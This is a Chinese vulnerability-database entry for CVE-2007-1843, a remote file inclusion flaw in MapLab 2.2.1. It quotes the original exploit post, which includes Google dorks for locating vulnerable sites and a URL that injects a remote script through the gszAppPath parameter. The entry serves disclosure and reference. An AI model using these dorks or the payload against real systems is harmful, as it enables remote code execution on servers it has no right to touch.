MapTools MapLab 'gmapfactory/params.php' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112617 漏洞类型 代码注入
发布时间 2007-04-02 更新时间 2007-08-02
CVE编号 CVE-2007-1843 CNNVD-ID CNNVD-200704-063
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-063
|漏洞详情
MapLab的gmapfactory/params.php中存在PHP远程文件包含漏洞。当register_globals被启用时,远程攻击者可以借助gszAppPath参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
Bug Found By ka0x
D.O.M TEAM
we are: anonyph;arp;ka0x;xarnuz
Contact: ka0x01@gmail.com
FROM SPAIN
---

Script: MapLab
Version: 2.2.1
Official Site: http://www.maptools.org
Download: http://www.maptools.org/dl/ms4w/maplab_ms4w-2.2.1.zip

--

Bug File: params.php
Path: /htdocs/gmapfactory/params.php

Bug code in line 130:
include_once($gszAppPath."htdocs/gmapfactory/build_phtml.php");

--
Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

--

Exploit:
http://site.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript] 

# milw0rm.com [2007-04-02]
|参考资料

来源:XF
名称:maplab-params-file-include(33360)
链接:http://xforce.iss.net/xforce/xfdb/33360
来源:BID
名称:23249
链接:http://www.securityfocus.com/bid/23249
来源:BUGTRAQ
名称:20070402Re:Maplab<=2.2.1(gszAppPath)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464503/100/0/threaded
来源:BUGTRAQ
名称:20070402Re:Maplab<=2.2.1(gszAppPath)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464490/100/0/threaded
来源:BUGTRAQ
名称:20070402Maplab<=2.2.1(gszAppPath)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/464462/100/0/threaded
来源:MILW0RM
名称:3638
链接:http://www.milw0rm.com/exploits/3638
来源:VUPEN
名称:ADV-2007-1203
链接:http://www.frsirt.com/english/advisories/2007/1203
来源:SECUNIA
名称:24715
链接:http://secunia.com/advisories/24715
来源:OSVDB
名称:34620
链接:http://osvdb.org/34620